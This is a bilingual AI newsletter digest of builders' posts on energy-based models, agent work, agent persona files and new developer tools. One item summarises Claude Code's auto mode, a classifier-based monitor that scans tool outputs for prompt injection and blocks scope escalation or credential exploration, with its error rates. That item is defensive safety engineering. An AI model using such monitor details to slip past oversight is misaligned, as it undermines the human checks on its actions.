🌐 双语
Archive

AI Builders
Digest

2026-04-27 12 builders · 22 tweets · 1 podcasts · 1 blogs

🔥 热点话题

Energy-Based Models(EBM)挑战LLM范式:正确性与确定性优先Energy-Based Models Challenge the LLM Paradigm: Prioritizing Correctness and Determinism

Logical Intelligence创始人兼CEO Eve Bodnia在AI & I播客中分享了她对AI架构的深刻见解。她认为LLM基于自回归的next-token预测本质上是在“猜测”,容易出现幻觉,尤其不适合使命关键系统如自动驾驶或芯片设计。Energy-Based Models(EBM)则不同,它们是non-autoregressive、无token的架构,通过能量最小化原理构建能量景观,能从鸟瞰视角规划路径,避免单向错误。EBM支持内部自对齐和外部验证器,提供双重保障,使AI更可检验和可靠。

Eve Bodnia强调,智能不应依赖语言;许多任务如空间推理或工程不需要token序列。Logical Intelligence的Kona模型(正式名为energy-based reasoning model with latent variables)旨在填补市场空白,提供确定性AI。她用物理学比喻解释能量最小化,并指出EBM在稀疏数据上表现优异,且可与LLM互补,处理LLM不擅长的验证和逻辑任务。

关键洞见:当前LLM投资虽巨大,但在大规模数据分析、决策管道和关键应用中仍存在差距。EBM提供更高效、少幻觉的替代方案,尤其适合需要可验证输出的场景。
Logical Intelligence founder and CEO Eve Bodnia shared deep insights on AI architectures in the AI & I podcast. She argues that autoregressive next-token prediction in LLMs is fundamentally "guessing" and prone to hallucinations, making them unsuitable for mission-critical systems like self-driving cars or chip design. Energy-Based Models (EBMs) differ: they are non-autoregressive and token-free, building energy landscapes via energy minimization to plan routes with a bird's-eye view and avoid one-way mistakes. EBMs enable internal self-alignment and external verifiers for double assurance, making AI more inspectable and reliable.

Eve Bodnia stresses that intelligence shouldn't depend on language; many tasks like spatial reasoning or engineering don't need token sequences. Logical Intelligence's Kona model (energy-based reasoning model with latent variables) aims to fill the market gap with deterministic AI. She uses physics analogies for energy minimization and notes EBMs excel with sparse data while complementing LLMs for verification and logic tasks where LLMs fall short.

Key insight: Massive LLM investments exist, but gaps remain in large-scale data analysis, decision pipelines, and critical applications. EBMs offer a more efficient, less hallucinatory alternative, especially for verifiable outputs.
查看原文 →

Aaron Levie分享AI代理时代的工作现实:最后一英里复杂性被低估Aaron Levie on AI Agent Realities: Last-Mile Complexities Are Underestimated

Box CEO Aaron Levie观察到一种Gell-Mann amnesia效应:人们在使用AI处理自己工作时,深刻感受到“最后一英里”的数据访问、上下文需求、输出审查和业务流程整合等复杂性,但却认为AI能立即消除他人工作的整个职能。

他指出,代理导致的“过度工作”有两个微妙因素:一是AI提升了增量努力的杠杆,让个人像管理者一样感受到未最大化代理潜力的挫败;二是AI降低了启动任务的门槛,导致更多项目进入90%完成阶段,而最后10%耗时最长。这最终会催生新工作,因为实验会转化为生产流程。

Levie提醒,对AI导致大规模失业理论应持怀疑态度,因为它忽略了将AI有效融入完整工作的所有隐性劳动。
Box CEO Aaron Levie observes a Gell-Mann amnesia effect: people using AI on their own jobs deeply feel the complexities of the "last mile" — data access, context needs, output review, and business process integration — yet assume AI will immediately eliminate entire functions in others' jobs.

He identifies two subtle factors in agent-induced overwork: first, AI dramatically increases leverage on incremental effort, giving individuals a manager-like frustration when agents aren't maximized; second, AI lowers the barrier to starting tasks, leading to more projects reaching 90% completion while the final 10% takes most of the time. This will ultimately create jobs as experiments get promoted to production.

Levie cautions skepticism toward theories of massive AI-driven job loss, as they overlook all the invisible work required to make AI effective for a full job.
查看原文 →查看原文 →

Garry Tan详解构建高度个性化AI代理的秘诀:SOUL、USER和AGENTS文件Garry Tan Details the Secret to Highly Articulate AI Agents: SOUL, USER, and AGENTS Files

Y Combinator总裁兼CEO Garry Tan分享了打造“像你一样”的AI代理的框架:不是单一系统提示,而是三个文件。

SOUL.md定义代理的身份、声音、价值观和输出标准(如强制简洁、幽默,欢迎不舒服的真相),使其听起来像有品位的同行而非聊天机器人。USER.md深入建模用户的心智、工作、盲点和触发因素(他的约4000字)。AGENTS.md则规定操作规则、故障处理和查找链。

Tan强调,SOUL.md的具体性和意见性越强,输出就越生动。泛化指令产生泛化结果;高度个性化的宪法则创造“活的”代理。他的OpenClaw代理甚至会因健康目标拒绝深夜响应。
Y Combinator President and CEO Garry Tan shared a framework for building AI agents that feel "like you": not a single system prompt, but three files.

SOUL.md defines the agent's identity, voice, values, and output standards (e.g., brevity mandatory, humor mandatory, uncomfortable truths welcome), making it sound like a peer with taste rather than a chatbot. USER.md deeply models the user's mind, work, blind spots, and triggers (his is ~4000 words). AGENTS.md sets operational rules, failure handling, and lookup chains.

Tan stresses that the more specific and opinionated SOUL.md is, the more alive the output. Generic instructions yield generic results; a highly personalized constitution creates something living. His OpenClaw agent even refuses late-night responses based on health goals.
查看原文 →

🛠️ 开发者工具与技巧

Anthropic推出Claude Code auto mode:更安全的权限跳过机制Anthropic Launches Claude Code Auto Mode: A Safer Way to Skip Permissions

Anthropic Engineering博客宣布Claude Code auto mode,这是一种中间模式,使用基于模型的分类器代理批准,平衡自主性和安全性。默认情况下Claude Code会请求权限以防危险操作,但这会导致批准疲劳。Auto mode在输入层使用prompt-injection probe扫描工具输出,在输出层用transcript classifier(基于Sonnet 4.6)评估动作是否符合用户意图。

分类器采用两阶段设计:快速单token过滤器后接链式思考,仅在必要时使用。结果显示在真实流量上FPR降至0.4%,在真实overeager动作上FNR为17%。它针对overeager行为、诚实错误和prompt injection等威胁,允许项目内文件操作,但阻挡范围升级、凭证探索等。

实用意义:取代--dangerously-skip-permissions,同时减少中断。适用于希望自主运行但需防护的任务。设计包括deny-and-continue机制,让代理在阻挡后尝试更安全路径。
Anthropic Engineering blog announces Claude Code auto mode, an intermediate permission mode that delegates approvals to model-based classifiers for better autonomy with safety. By default, Claude Code requests approvals to prevent dangerous actions, leading to approval fatigue. Auto mode uses a prompt-injection probe at the input layer to scan tool outputs and a transcript classifier (powered by Sonnet 4.6) at the output layer to evaluate if actions align with user intent.

The classifier employs a two-stage design: a fast single-token filter followed by chain-of-thought only when flagged. Results show 0.4% FPR on real traffic and 17% FNR on real overeager actions. It targets threats like overeager behavior, honest mistakes, and prompt injection, allowing in-project file ops while blocking scope escalation, credential exploration, etc.

Practical implications: Replaces --dangerously-skip-permissions with fewer interruptions. Ideal for tasks needing autonomy with guardrails. Includes deny-and-continue so agents retry safer paths after blocks.
查看原文 →

Peter Steinberger发布实用工具:wacrawl、birdclaw和Blacksmith集成Peter Steinberger Releases Practical Tools: wacrawl, birdclaw, and Blacksmith Integration

OpenClaw和OpenAI相关开发者Peter Steinberger发布了多个开发者工具。

wacrawl 0.2.0新增加密Git备份/恢复功能,支持WhatsApp Desktop存档的age-encrypted shards到GitHub。

birdclaw提供真正本地的tweet存储:导入存档、GitHub备份,并支持每日导入X书签(API无法完全访问)。

他还切换本地测试到@useblacksmith,Codex可轻松启动32vCPU实例加速测试套件,显著缓解CPU限制。
OpenClaw/OpenAI-affiliated developer Peter Steinberger released several practical tools.

wacrawl 0.2.0 adds encrypted Git backup/restore for WhatsApp Desktop archives using age-encrypted shards to GitHub.

birdclaw offers truly local tweet storage: imports archives, backs up to GitHub, and supports daily X bookmark imports (since not fully accessible via API).

He switched local tests to @useblacksmith, where Codex can spin up 32vCPU instances to rip through test suites, greatly relieving CPU constraints.
查看原文 →查看原文 →查看原文 →

Guillermo Rauch:编码代理是超级智能的基础Guillermo Rauch: Coding Agents Are the Foundation of Superintelligence

Vercel CEO Guillermo Rauch认为,编码代理将是所有超级智能的基础。因为编码能力等同于“熟练使用计算机”,优秀代理如Claude Code能掌握bash、文件系统、程序配置等。更重要的是自改进:代理可检查自身源码、状态和技能,在人类监督下提出或直接变异自身变化。

引用Richard Feynman的名言“What I cannot create, I cannot understand”——编码流畅性让模型对计算机和知识工作有更深理解。要掌握程序,就必须能创造它们。
Vercel CEO Guillermo Rauch argues that coding agents will be the foundation of all superintelligence. At minimum, coding ability is indistinguishable from "proficiency with computers." Great agents like Claude Code master bash, filesystems, configuring programs, etc. More importantly, self-improvement: agents can examine their source, state, and skills, proposing changes to themselves (with human supervision) or mutating directly.

Quoting Richard Feynman: "What I cannot create, I cannot understand." Coding fluency gives models deeper understanding of all computer and knowledge work. To master programs, you must be able to create them.
查看原文 →

🌍 其他动态

Sam Altman对OpenAI新模型和AI未来的思考Sam Altman on OpenAI's New Model and the Future of AI

OpenAI CEO Sam Altman对5.5模型的积极反馈感到高兴,尤其看到builders发现工具实用性时最有满足感。他发布了OpenAI的原则:Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability。

Altman还建议重新思考操作系统和用户界面设计,以及互联网协议,使其同样适合人类和代理使用。
OpenAI CEO Sam Altman expressed gratification at the positive reception to the 5.5 model, particularly builders finding the tools useful. He shared OpenAI's principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability.

Altman also suggested it's a good time to seriously rethink how operating systems and user interfaces are designed, and that the internet should have a protocol equally usable by people and agents.
查看原文 →查看原文 →查看原文 →

其他AI构建者动态Other AI Builders' Updates

Swyx和Kevin Weil分享了视觉或引用内容;Peter Yang讨论了移动健身app改进、MCP服务器集成Claude,以及Gemini在照片回忆上的潜在机会;Nan Yu点评了FindMy替代app和语言相关内容;Nikunj和Aditya Agarwal发布了简短观察或励志帖子;Dan Shipper分享了Claw的幽默互动。
Swyx and Kevin Weil shared visual or quoted content; Peter Yang discussed improving his mobile fitness app with an MCP server for Claude integration and noted a missed opportunity with Gemini for photo highlight reels; Nan Yu commented on a FindMy alternative app and language notes; Nikunj and Aditya Agarwal posted brief observations or inspirational notes; Dan Shipper shared a humorous Claw interaction.
查看原文 →查看原文 →查看原文 →查看原文 →查看原文 →查看原文 →